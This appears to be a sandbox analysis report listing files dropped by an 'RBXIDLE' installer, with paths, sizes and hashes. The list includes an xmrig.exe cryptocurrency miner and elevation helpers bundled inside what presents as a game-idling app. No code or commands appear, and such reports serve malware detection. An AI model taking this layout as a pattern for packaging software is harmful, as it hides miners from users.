d6a81756bf1d63969d22b705cb2f79062ff0917204ca4cb35ae5deaa61a3e517

SHA512
eb7c750eb7fa03987cb3208b330af6ff8bc441ee2b909f10eeaa8c1adde29342bf27f60f0fb624355c7ab2b607b4da42ab49cc404a9664fac14d5557b3877a66

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
1.3MB

MD5
612305fb25c18890a7c8194cd1e92517

SHA1
91a5a144eba21a0d395a4c4f8eb89d364d1497d0

SHA256
51c03e3238b388848041903c2994c84b34ffe09395b29219ae24aa4c07dcb84e

SHA512
fa1a7f14bfff7b6c2bf8bc1800901e540c5824ec368f13863307608f9bf035173b4cabe25e40fc5c9f362d714e173e084c10fd9bf126c1ba6dfbe2cc073d4bcf

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe

Filesize
11.1MB

MD5
6b6689fec09d20c078ca64eeaa717c1b

SHA1
6a20c63892b01cd63b59ae89eef718973439ecfa

SHA256
55698a54c614136560850d1682382dc8f6f8162c4b14c2b088244d862b5b8d4a

SHA512
511de77e9c2d27fc1ff1d00a1ba325f51698a147229a9815d4c870f8572c9c8797828ada887f87f451dacc34663a4730ec2f2f9ccdd34813d75dba9cb925b979

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\chrome_100_percent.pak

Filesize
138KB

MD5
0fd0a948532d8c353c7227ae69ed7800

SHA1
c6679bfb70a212b6bc570cbdf3685946f8f9464c

SHA256
69a3916ed3a28cd5467b32474a3da1c639d059abbe78525a3466aa8b24c722bf

SHA512
0ee0d16ed2afd7ebd405dbe372c58fd3a38bb2074abc384f2c534545e62dfe26986b16df1266c5807a373e296fe810554c480b5175218192ffacd6942e3e2b27

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\chrome_200_percent.pak

Filesize
202KB

MD5
1014a2ee8ee705c5a1a56cda9a8e72ee

SHA1
5492561fb293955f30e95a5f3413a14bca512c30

SHA256
ed8afe63f5fc494fd00727e665f7f281600b09b4f4690fa15053a252754e9d57

SHA512
ac414855c2c1d6f17a898418a76cce49ad025d24c90c30e71ad966e0fd6b7286acf456e9f5a6636fd16368bc1a0e8b90031e9df439b3c7cd5e1e18b24a32c508

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\d3dcompiler_47.dll

Filesize
1.7MB

MD5
a5ee15126188f28e9fbc2bd6fe015298

SHA1
e042049db5b1ba4bce0d952ec24f551f59cf5651

SHA256
8e4f07b3892cf602e0484b9d5d49f1d2c171788a2a652eef971efee9fdf978da

SHA512
bb8f6917b1a9e6ebc928479986693b71f6efad6d0395f48b446d1a3ed37c1df160455ad2f29804cd905741c95f588e2d8eb6eb0827104a2f1c6ef68a126267fb

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\ffmpeg.dll

Filesize
384KB

MD5
df4db1a7e25938b36bec3f8872ec0102

SHA1
d1fe93ba0a9a3770a9a73f2b3d2d20ca71ce2204

SHA256
77712941a7d9ed319428ecc2090569c4b739c25916ca988cf470ebfc565ed566

SHA512
099258d9c2e18062b82a425d08933d425a89b7c4c98d276ee0310e44ea30c9aaabf9398d6174323cd5a536eaf8d5259ad89fe06fa6cc865332076248c3b67e0f

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\ffmpeg.dll

Filesize
448KB

MD5
9292ea240bd5b91adbffc79d4513a2c7

SHA1
3cf9473474e41c13664922b159e8c418425539d6

SHA256
0cc07831da8bccdb31559f8e08ca2c54180d7753b6a3bc8ab5b82e293e1fd71a

SHA512
7e498ed8b32e0db231da7f7e0c874e7d2f731b3463dcf535d92f9ff456f89c66f2254ebed6db3e79e2b7cb31965ec78031f395df63b396c3ec025f5da780bf68

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\ffmpeg.dll

Filesize
320KB

MD5
6364c7f0514292061c7caf987e9d1a65

SHA1
294933274e00fdfbe5834be8e3767f5a87e991c1

SHA256
a2be9432e4571b6cd47783547210b74e007e3d3cd064b68737c129187e6289f4

SHA512
0e4b1c2aa2ccdeeb775015d233fa9bf29bebe13509e302c4f88d4604f839cfdcc6330dd819fa9a3c7704f16184e00395d5cf3fa84afe6325b122976a1cafff5d

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\ffmpeg.dll

Filesize
192KB

MD5
77693a604a074dbfd1490afb34adab67

SHA1
e29cc8335266e1c8075f3db90695efb7f0bfc463

SHA256
e840ddbf803b233b98b98b5aee86c54231d7b42ee6e0d85dfa8727a1f0b24f12

SHA512
4d3a0c34b44a4781ad203df1727a102b263890787bda7a76b05c096be4034c67a2e1de07e51c7a6aa233c1dc9bf1532a99c3dc4a6724db53192e36b73e70a3fb

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\ffmpeg.dll

Filesize
1.2MB

MD5
0bac82e1c60eb81b0fc03a87faa10165

SHA1
64468c30c728cd8c3671872d90497931b9592cf5

SHA256
9f63fbbee9f84a55b234a248e95103b8417ee8b88cbbd2cfb30d7c2332b5bc16

SHA512
71ced9558f5c14bc91f13048fb9fc359000d39bef2825b8164c704f3698743a091b5d6e5ebbbdd5b09ca3e8eb800d52107cf488adc17484b73ab4c563443c930

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\icudtl.dat

Filesize
2.4MB

MD5
dcf16523bf997886154a63763d48ee33

SHA1
e7b862c481378d2ceb78e384145a150156cfe357

SHA256
ef37541c188ebbc5b568bdefe396d0095cc0350a8dcd7c4635552fd2def81781

SHA512
8a14140a78b10e975ded980982b7a8735ce76d2285d95c5b8c462575ce5e853ae0e1e87022e02475828d6f4ce5b32a88d89f895e869434adad4f968cc7852c15

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\libEGL.dll

Filesize
431KB

MD5
2abed6d1a85117fc8e319db10303df46

SHA1
b8adf5c210d4d8cb7fe47d1fcbe5aaffef6a7c1b

SHA256
13bba503fb0ad061b3b32f3a1580c50e3379c8f8da4de009c85bca294ad0d6e8

SHA512
020a3c1f58f3eecaa992ea59fa09ba49fe5da6d117988235a847eec7bfe4256093dd1fe2e8c017260eb6c23f7602a67d49c10d5f8d1afe21af848f2f96c11b7e

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\libGLESv2.dll

Filesize
1.6MB

MD5
2777a0e421950f27edf02c0da8bfd965

SHA1
8ed2f179aa8f688817ac3e34023dade3da53c0bb

SHA256
238da7a358bdfb18189053ce64e060264d55c3403a290ea57d1cb3126f4d979d

SHA512
37b1bf0f605186fb2b7246240d90125c43bdfc6ee0c909cf75349a9fb454b844466893f3887a5ec9d409621623378e19e0e18236d6b59e05204885d5c9d61fef

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\libglesv2.dll

Filesize
1.7MB

MD5
e665935a233d990ca11c9022f2f1cfd7

SHA1
5899371eddb559aad484b488d4968e494d14ee8a

SHA256
8c2f671ef5aea0bf0cb16b4cd4c77e7dda874affd86ac1450da5d9eb98028bb4

SHA512
9b14365718674da2d13dee5f1eaf2c5913af2c3595ac46ac317e1d215952faf63e6049e00437da26366c6b381d0e38818a6f070d78f6828259975689ddd48e54

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\locales\en-US.pak

Filesize
95KB

MD5
214e2b52108bbde227209a00664d30a5

SHA1
e2ac97090a3935c8aa7aa466e87b67216284b150

SHA256
1673652b703771ef352123869e86130c9cb7c027987753313b4c555a52992bab

SHA512
9029402daea1cbe0790f9d53adc6940c1e483930cf24b3a130a42d6f2682f7c2d6833f2cd52f2417009c3655fed6a648b42659729af3c745eaa6c5e8e2b5bb9e

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources.pak

Filesize
640KB

MD5
7430f781126c1a161cb86323126b3da7

SHA1
43ca40610ac67fcf56415e5d8fadde78f7e55622

SHA256
ad75d02f395185e8c40e4642ec161e363b2e85b798a23107949771df0e08d026

SHA512
8249f5c902f6d5bef1a93f05717e0aa998d16452c05aea86d3b18195e5690d8623ce229f6a2ae60895ed6db57a3162d6f1be4ccdad2fee1ff0635ce250dfbd5b

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar

Filesize
1.5MB

MD5
fed1889b94580a7fe5f7da8ab492720f

SHA1
dccdab416da77a35351eeb31378b31b46adcde42

SHA256
41ac56e02a19042c910e750eb7872579271434c01244446aebcf00c22d42cb04

SHA512
6673d381b88f6b5c7af7e201186510167b8f102bb5e349098a069584c3687f066ebb92fe7395772eab5c0c7b37b75e69daa4704801d86561b4ed6db14a70e518

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\dist\bin\is-2B1UJ.tmp

Filesize
68KB

MD5
6dbc4226a62a578b815c4d4be3eda0d7

SHA1
eb23f90635a8366c5c992043ccf2dfb817cf6512

SHA256
0eb70bd4b911c9af7c1c78018742cadb0c5f9b6d394005eaeaa733da4b5766e5

SHA512
3a2836f712ad7048dbeb5b6eec8e163652f97bea521eafcff5c598cbedf062baefaa7079d3a614470ef99ec954dac518224cb3515ca14757721f96412443c7c4

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\dist\bin\is-LI057.tmp

Filesize
105KB

MD5
792b92c8ad13c46f27c7ced0810694df

SHA1
d8d449b92de20a57df722df46435ba4553ecc802

SHA256
9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37

SHA512
6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\MacOS\is-C3BNI.tmp

Filesize
24KB

MD5
bb97e2ae9bc6bf8e171d26e40f59361f

SHA1
9bcd87d5bca1e18efbd118d93d76002aa12baa12

SHA256
1f93d65a2692da30ba3997fdfbfbbe5880c2ea76d6cab9102faa8a6431350e02

SHA512
606111b939b1fbe3008f90af616470e9c9d320a70021348540c03d32355892c5989df28d08158930bda313d3f0d9549aaaaa7ea6c1788ce4e283340abb954163

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\Resources\Scripts\is-JQLD2.tmp

Filesize
526B

MD5
35aaeb5ecdda5864920916f04d2ec307

SHA1
266ee05dd4a3e1869e318825c97c3290ae4439e5

SHA256
21ff89939fd03764301b1ab1cef0baa277bd2245fc5b9b4b5aed08c1efedfff3

SHA512
00a609155a776cdfdb0a0cf4c6ea43e0dcb9a8ca2d3b842dacb426a83b835c053700388912b4f1575150167167aab442fcc5b436e1326d81c6bb8e10ac3a1520

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\Resources\description.rtfd\is-TN48E.tmp

Filesize
102B

MD5
cb51e6fa885502ba84f7d85355106e28

SHA1
def335a818a1ade9e99cfe7144e83bed2723212d

SHA256
ca58c48c0f35c7768863f31357f68393f7709e9810818b3a06b3004274f03a56

SHA512
33dbeb9c18e2a54c7c41282d73284b0a8c6d3ed0bb5cc556ce5d02ef0c670c86b74b46589750b866d2f148ff3b7dea655e1f3403f50847d527de4d24a5cbb905

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\Resources\is-9FS9V.tmp

Filesize
55KB

MD5
9ace56046961a8104d0f5121872cc010

SHA1
80fe32788daf39b1c16ff4c471191d1d212423fb

SHA256
dd9aa7a2c61535a9a49645f7f049a5581be150456ec1f18193d43ea0b6cc273a

SHA512
330ad8371fccf39efffc847a32be32cfea8a8693474d7d0537e80c0b0200ee8561a732fb98072caa5a4d65382b417d78430586b640266c811c51f3ef3ac1529e

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\Resources\is-B71VB.tmp

Filesize
362B

MD5
4cdcdd8071d02ede6173232f7bb19bdb

SHA1
b70c045a79039e50417958fddb7fea8b4b9efbfd

SHA256
6f2a0cd9dbfc52578dc28a25abe671d0ae63c36cdd06b6be8f08c56f02fbba13

SHA512
049c467eed33d2d19ceeea6a00218dc3236ff27310277416cf8891243d774498172755cd7d5f0433ee0e8dc677fb350a25e44d9c763498e4906ab13dd92074f5

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\is-C87IA.tmp

Filesize
8B

MD5
db6f4017a24d2cb070ad3de12adb78f4

SHA1
94fdbee3e734a2df38fd68be4837e8fef066f005

SHA256
412d70757c4fdecdd73355ac4bb3ba80c6705110d15cfbc9fe925e7b4faf7962

SHA512
decf0a4297001fe030bbeba5748a72e9685a4590c83a90ec512dc28412a4a4f89e8ce97d1c8824309f50d9ea111e42c9428714017bdad47ff3fd7d241e19a352

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\Contents\is-ECF6N.tmp

Filesize
960B

MD5
a0e3bdbe9880037f3c31443251b43932

SHA1
5786a415fd2dbcc2250751a15801225b88ab7993

SHA256
36f93f53854708454d6f6f05232e28b17b1dbfbe94cc194470e449c4e7e9dba3

SHA512
355863267b4e48ae9575ca1baab1c2a167fe60e7ea568df52ebfb317c89e0511b5c88f13fbd55b880b4b53ce0a688c0c005412bc31c67c0e895f123f713c75f6

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\applet.app\is-BC94R.tmp

Filesize
1KB

MD5
ddbfd5852e8bd2337f0cc8a40d9f4d80

SHA1
8479b510d385d3c4be23f6ffad3b1be2db329179

SHA256
bb6f80cccd928864f67dc6ddba48443dfb51191b9d6506b01823ec05c48a151d

SHA512
875490e7ff4c9bb387e48223ed91b4d5f18dfbdc27f045ab7fb302d4882c094371fed961f9eea85673ab41aa8fdd785412cc91fa3282270e24787949304bb146

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar.unpacked\node_modules\electron-sudo\src\bin\is-FK4EA.tmp

Filesize
27KB

MD5
60321adade3f5c1dfd761800fe1909d3

SHA1
39add6e5c395d04d3450874cbf79050d91674d04

SHA256
6a669fdc9331a3e8c4a75ff456bc66f96e85a8dfa3d28828307fc68d92e70fb1

SHA512
5f3c21dbc86318d0a3786313a433ae95a58241e7b8053ab9f2292a96e83b569219a6406b39d2e3a832d05314437e1d8db0c128858fe0a4b4369a65500c63e77e

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\idler.xml

Filesize
3KB

MD5
480a741af8ce19faead029edc0ccbd1a

SHA1
87be7d55ebf72b28d551398baeccfa9687d48729

SHA256
cedf0f77769f73eaf66111d626a4475c4486df1837196bc6d2c319e0d90157d2

SHA512
e8bd9b101a7e29e110fbe350c9344b41951f253bd3d6adf34b236404283b4e9db9b34ad6aca1fa65acd374776d77d66e3e2d5492926649d447bfbb7b1db6df28

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\librbxidle_amd64.dll

Filesize
2.0MB

MD5
862ff7c048e81a27f40903df5de97d68

SHA1
755248df622ed113a25d3a38f4bb35802abeb8ec

SHA256
e41e58a4f6d199cebf8e2018fb7185ea93593e75245de37a2017e197b3fd2848

SHA512
d34790c002c83b3922fc7f67aee5879b7f92d23eaea9fcf7f0eac571c66b6e266f5d90583a8ca38aa224c9fa8b696898a0270667b75a619c9fabb8f84197a75f

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\librbxidle_amd64.dll

Filesize
1.6MB

MD5
af87de6b1d3091706724fe2c9b98a4cd

SHA1
465af2e9b3be7bfc1c8611df2cb497663db3074d

SHA256
9ec7a64aea06bae47dbdc92689b4f55fcfe21e8af3e365142b17902734782c84

SHA512
5c77e44754e337a2ac273c13deb8e8a4614e9ff09f56d9ab0a0065bff80ee1f7f883b066db14542fca8e668465b328db9579bddf36da9f834a23f1099ea0db73

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\netmanager.exe

Filesize
5KB

MD5
3321d2efa325e03bbf17c2a88791f519

SHA1
93ddfff3ce9592126f5ccc20481ab59527f58a45

SHA256
1ca919aedd68e15b0ea91cf945b4dd953b26bd70512982793fd6f8a6a9f72774

SHA512
c20729b82a4e500f21679db134336144eea0ecf8f8192d05aa0c67287a2ffe23f04b916d36cd0970ccf5d0110b2eb6d8aa168c4e5fb8dfaf88047534ed734790

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\netmanager.exe.config

Filesize
174B

MD5
29de2c28e23204909e646ee3489ce4ab

SHA1
1f75258825661c5e0464414de06805fc57de6686

SHA256
b1677d78346f02aa0ffaff28c796ba8f292ff801ec1a646909357a8298e372d2

SHA512
0cac4a63219b4f72e10bf2f9ec78a38a0e646028ca784b0208a380fe93e092ac6fb58a4d14f931765c99a352f314c90214e292504d843192fb2e5db9c5708d89

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\netidler.xml

Filesize
4KB

MD5
ddc7934f07ca9e4bd7afd60ea2e0b33e

SHA1
d4f42dbf63fff98928170d3098528b1e97a6c5f2

SHA256
4f054e8953caf176702af3d28330b52d4064c3f54038a1bbc79e693c67e507b0

SHA512
45416e7f1e41bc57ec59913afd4b85e7504522637a86420f0d93bedf31b552ed7ac8e32701622b60da9d0897d77e7bf281575c5b7e1a27642a2a7cf7416b9c5c

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\netstartup.xml

Filesize
3KB

MD5
62c809ee14b9f58783f3c8160d2564f9

SHA1
adb2b1111e3c191c6d577db4910f5f0061331244

SHA256
46562a4eac05a5e825050448a41d975717d0b28c098081f54f181621d9e7104f

SHA512
5332e877bf8f1d9a10444dce06173448244a4264f57d188fc794ebce135051869f91dd41705a5079e107eb6d2ce31371ae03ad6bc56edbce518f358e1cf52f5c

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\rex\is-T2MFP.tmp

Filesize
77B

MD5
2d979cfc95c6a20e03b679240d0a761d

SHA1
56b4e450a1584df0a6df666e1df6bb0e59923a13

SHA256
ca5f8b2b53eb90262156507e13d49dd3b22f47ccffb8b7cd427c1d28a8cf6d81

SHA512
b1c6fb5dc0d8034b7174bbbd2600506379ccbb9ea35dfc432ec090243a64f4d52f38ad152f4c764b5a3029d571bd65c924fff46f9a8f06f15853b32b3cd6cac7

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\xm\xmrig.exe

Filesize
1.3MB

MD5
23f799acd2d55e6d7915950e7328b068

SHA1
7c3f9bc703f0ff86a599913ccde4f4c33c39c5b0

SHA256
64a896322fe6d34f7bfbeed5e25c12451448d9169b24be10cf763f2b97f3e49e

SHA512
27ac8ffef4ffd8505a713a6fefebef1f426eb3649701c350a2f8ec4e5fae32aa1565695451141cb761e92082773aa1a4b3e3d4521c9182566ba6219439e5ce61

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\mkr.txt

Filesize
67B

MD5
b382149206b68f897a994d17a048a0dd

SHA1
1f8e92af065f48baf39ff49df49828111c4c626e

SHA256
7aec1cd7286d0b1382f207a27da79febe195dbd656a6373e5f096c4fae1fb3f5

SHA512
8a39e6ec36acc9d2f8d5ce577b0b7419eedd3b4eb7c36bed42eae74ee82f4e72a4f8d2ad41117c2e7447cdcf9d9f78bc0cb49d3b7334a6f7ad20bbbc45805eef

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\netmkr.txt

Filesize
70B

MD5
c42a1b325e82f6e9e4a3e60c7689792c

SHA1
8f7a5ba6e7d89d7f6626a3eb85929b9b7ed6a251

SHA256
78f8586c3555da9f25f85e271e275838a3d7dab8e045fee0c1970fd618e2fab5

SHA512
2aa7670a40a5fda58489dbe882201653c6db9362ab84a4c753fad242223ae55ba93e772108d538a5222580594e54642fa5fe36942b06fb1f764e4b751880b7d7

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\v8_context_snapshot.bin

Filesize
160KB

MD5
03c3851343e11392b24b91897910b060

SHA1
9ec2de38a63ed606c1ed545f583ac427b48b3192

SHA256
0abf6a4b73a4abf6e43eb8eac6fa9399164166502de4fd23e9a659f47a416600

SHA512
80144fa894ff193027b4ff24a0d4301e41d5f0fbc39dc1e5c14f2834e9092765739a956260182396f275faabfe07329c685bb095a9aa72286141d9b1cb0a354a

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\vk_swiftshader.dll

Filesize
1.6MB

MD5
5e24ad44776b85c433abce69ec4d9268

SHA1
5394e9aed0dd3533fd354dc2172296861dad13e3

SHA256
c255b563232fa45697fd9547d6d92fa7ed7db56b0b496253be24d65de129e226

SHA512
1c4900bcc1be7d9ec7b900b57a6a9db306e81a60b817ed3a49d26bf74eb5fdacf876fd5b60db3c1fdf21c7028d4fc205c302ee28e52ee79ed4684a8818980437

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\vk_swiftshader.dll

Filesize
14KB

MD5
b8fafa79700d671ad25eed246af67778

SHA1
b35435f34d1c3a0706e91602b3a3bd500fbf6232

SHA256
76485e8d527a78cc7dc2dabf358d1c7399c8811f3ed2e1036bee08ac2b0c825a

SHA512
b4ae186515029c5e3a44b3173ca0c8f18d31d6d8aa778d71fc7c309426824bb065dde8fdf815d114f3a21265221c76bdff97bbf9277ab9998f5d80eaf98ffc1d

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\vk_swiftshader_icd.json

Filesize
106B

MD5
8642dd3a87e2de6e991fae08458e302b

SHA1
9c06735c31cec00600fd763a92f8112d085bd12a

SHA256
32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9

SHA512
f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

Download Submit
C:\Users\Admin\AppData\Local\Programs\RBXIDLE\vulkan-1.dll

Filesize
715KB

MD5
6a05b161245180545849155b1cf63253

SHA1
db0393114078ff56c8fab49e2ed680324f4e31f3

SHA256
05c6d4aff774c0ee8190749a8cdc359ca294e0410a56666d14730f9456ff51e2

SHA512
0e4c8a15e55c274513f60f0e57da2dfea8c9fdcf47694bc7a4c0e29eb9a1d00d10f7e9493da7985dc352cc006e5244fc84c5a048e1d8a1f911757a41684fe257

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cnjiw5r.5v3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5HIDA.tmp\rbxidle-installer.tmp

Filesize
3.0MB

MD5
5d2b340269b80b8539565c734805b3a6

SHA1
473c11b4cd6890e1adae273f4b6f4ea90afa7338

SHA256
ef161a55ba9a195c92a394d598fb1dccd5a2932a0b7cfd0376c499123d0ecca0

SHA512
d83e51af7a181abf9db1c0a622660a1779b91c0a60cd5a93c6dbcce2c8ca60b964dbb4d2f3d68cccbda375b12d4b19ab3e2c97c9dea8dce08f678a1534a133d3

Download Submit
C:\Users\Admin\AppData\Roaming\2f5b14b6-4af1-4d8a-b260-41c82013bfc8.tmp

Filesize
1KB

MD5
27a2c6509abc5d56b3c268b73858c4a5

SHA1
c1a82c810d8915eab2d3487512cd981fdf0c7594

SHA256
b9f06f0f1d86798bec30047ee0b9fb378a202ef8ab9b08a7b351c3bea20490f9

SHA512
e41689ad2435f65c1902a0ced054e4c8b2c03e8318a4fb322e6d2eaf4622129bfe78ad24353c5784662c1523c612b733e0273ce96b654b12e84f46aa456323ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
f50f767c838b69905500d6203689fc86

SHA1
a66cbdd011a5f59ecea26f3d206121c01a05f037

SHA256
05486c10b987fb3922f2d60f2d9281529f9acb827e3338a867d39fe680834c92

SHA512
3522f438889fd4267af36d45966d2c4a3567e520408c6223331109f25fb3ce3c5868990312465b0675f09e4d4ac673b7fd75cfd67e5b506fb86fdde18068bf18

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
0ec92faf12f2a29e189a10a700e184e4

SHA1
678348df400258c6cb314ad8cc2776b8aa2f5700

SHA256
c77db5a0a3d812480d25b325dbb9b080d2d70a0b748574d203dbd9986df8ea8d

SHA512
bebdfeeb7f6ac17767061b1778c96319b97144160bf19fb18659fd3ba9dabd1d0e7b58dd42e7d5d4cbda03897d8d628c7ef30a98b76d435045b58aea5c54c923

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
3837269e5915c8be2b4cfb962e17976c

SHA1
c9dbf1685feb5fa91fd0d75aab2088cabc4848a4

SHA256
9b14736eed3de11efa0768387ad070ef835ecb9865e63837cf0cbda5ec762899

SHA512
5fc964c2d42d8fe60ab157bf7b804dd35a675138ba2895325677556ccd7d3dc2ad94a244635810c5e03e971ebd6c68388b5963476dca7b15ed0152a1d31f6261

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
05f3904a93e12b5807106910e78174ae

SHA1
41d1fcd641c8904338f579329558abcc267cf678

SHA256
5c715537642dd43c1fcbfbf1abe5b3643755a00a2cd66997353727ae9190d574

SHA512
edff3935bb2d60b8ee577fc79acfc90acf11e918b1ecc1dd6d99be894f089ed5aefd2ca5bccd330c1cdd0f4fac0d5f0e44b2ba9e35bb7f9bd11d8c503ae6491a

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Network Persistent State

Filesize
4KB

MD5
15bf1425a5e90bf765bbb09c06b2f319

SHA1
b63e6f8150f22006e2069a945832f254c1853316

SHA256
40dbd834ddb2e01f527c2eaff1dd55276e49ec5ad61f1d6218547cdebe4f32ba

SHA512
ed5d91a4a7cba56be3e0e00cb8609542ce246b763d572bc36ff637a27fc46162a835d426bec9e141d6f664448b69edd65cb208b479add7532cdbccfbdea2a5fa

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Network Persistent State

Filesize
4KB

MD5
7d1b10a2fce75896e70f833ab9121662

SHA1
e1786398c33c90de9ee1311e6fb9ee30af07aee7

SHA256
8f285e3191dd3f1e034d426021d3b5a65e4c3e61fcf9cc016d2255db066fc5cf

SHA512
f0296b26e131a2b039b83b4ed80f0cc60240602b0f9567ec56890822111cee93cb0e6d5c010b3c995d9da58f5a94ad05b931dd2dff15c69f280df981a999f971

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Network Persistent State~RFe59e98b.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Roaming\RBXIDLE\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
90B

MD5
51c682641e52bbf7bcac2d9934022e39

SHA1
eb997e477d89fb0b0d4cdd6dca54bdf80a458437

SHA256
2e6ee7092701714bfcad7841961650d9827cfe608940693af0be3617f5f1af35

SHA512
57f79dfb4508bb78d303f804cc11915c7e65d57fe474fbf847e9607b54db7c1eb259d4700a7d0b9c835d6a70562dcab022b4a5c889e14383d3ad5c9bf0a336e2

Download Submit
